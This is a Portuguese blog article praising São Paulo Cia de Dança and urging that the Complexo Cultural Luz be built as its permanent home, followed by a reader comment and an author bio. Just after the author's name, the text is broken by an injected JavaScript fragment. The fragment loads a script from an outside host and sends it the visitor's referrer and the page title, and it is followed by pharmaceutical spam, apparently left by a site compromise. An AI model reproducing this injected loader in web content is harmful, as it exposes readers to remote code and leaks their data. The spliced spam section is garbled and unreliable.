Artigo

Complexo Cultural Luz e São Paulo Cia de Dança

A São Paulo Cia de Dança mostra mais uma vez estar no caminho certo para sua consolidação como o melhor grupo de dança do Brasil.

A excelência técnica conseguida em um curto período de tempo, excursões para cidades do interior e de outros Estados e o lançamento de diversas coreografias interessantes são fundamentais, mas não suficientes para a consolidação do grupo. Falta apenas um detalhe para sua imortalização, detalhe esse essencial. Essa é a impressão que fica após o evento realizado essa semana.

A fria e chuvosa manhã paulistana do dia 16, reservou agradáveis surpresas na sede provisória da Cia. Primeiro uma aula conjunta entre os bailarinos da Cia com o corpo de baile do Scala de Milão. Perguntaram se eu queria assistir à aula dos meninos ou das meninas, resposta óbvia, das meninas é claro. Interessante intercâmbio para ambos conhecerem o estilo e a técnica de duas grandes escolas de dança.

Finda a aula tivemos a primeira passagem da nova coreografia da São Paulo Cia de Dança. O Grand Pas de Deux do balé O Quebra Nozes tem remontagem assinada pela grande bailarina Tatiana Leskova. Com 89 anos de idade e muita disposição, a simpática senhora exige um apuro técnico enorme de seus bailarinos. A presença da trupe do Scala de Milão fez a Cia mostrar uma de suas mais belas coreografias, a Bachiana número 1, de Rodrigo Pederneiras.

Espetáculo bem brasileiro, com música que carrega nas cordas graves e mostra o romantismo do nosso povo. A entrevista coletiva com Tatiana Leskova mostrou sua maneira de pensar a dança. Indaguei a ela sobre a diferença entre a dança clássica e moderna. A simpática senhora não vacilou, disse que um não sobrevive sem o outro. Espero que alguém do Balé da Cidade de São Paulo leia essa importante colocação.

O mais interessante foram as palavras do Secretário de Estado da Cultura, Marcelo Araujo, ele reafirma o compromisso da manutenção da Cia e a excelência que ela adquiriu em pouco tempo.

Sabemos que políticos vão e governos vêm. Mudanças por interesses dos mais diversos acontecem toda hora. O principal compromisso da atual gestão do Estado de São Paulo para assegurar a manutenção definitiva da São Paulo Cia de Dança é a construção de sua sede. O complexo Cultural Luz é um projeto ambicioso com 3 grandes salas a ser construído em frente à Sala São Paulo. Obras previstas para o início de 2013 e com conclusão para 2016.

A instalação da Cia nessa sede é a única maneira de eternizá-la. O Complexo Cultural Luz pronto e a São Paulo Cia de Dança nele instalada, vai torná-la maior que qualquer político ou partido que venha assumir o governo do Estado. Ela estará enraizada de tal maneira na vida cultural paulistana que, como a OSESP e o Theatro Municipal de São Paulo, será intocável. Essa é a única solução .

Ali Hassan Ayache} else {s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; viagra generico pagamento alla consegna

1 Comment

  1. Fiquei encantado literalmente com o que foi aqui escrito, ele está certo 100%!
    Esperemos que também o projeto da prefeitura para um “world class opera house” comandado à TPC veja a luz em breve!
    Vi uma foto do projeto no site deles e é bem interessante. Darà ainda mais respaldo à produção artístico-cultural da cidade, sobretudo no que diz respeito às artes performáticas e musicais!
    Acho que o lugar ideal é exatamente nas imediações do complexo cultural da luz! …espaço para isso é que não falta!
    Ou também na Avenida Paulista, seria grandioso uma grande sala ali!
    Abraços e parabéns

    José Emídio

Leave a Response

Ali Hassan Ayache
Bacharel em Geografia pela USP. Apreciador de ópera, balé e música clássica. Ativo no meio musical, mantém o blog http://verdi.zip.net/. Escreve críticas, divulga eventos, entrevista personalidades e resenha óperas e balés em DVD.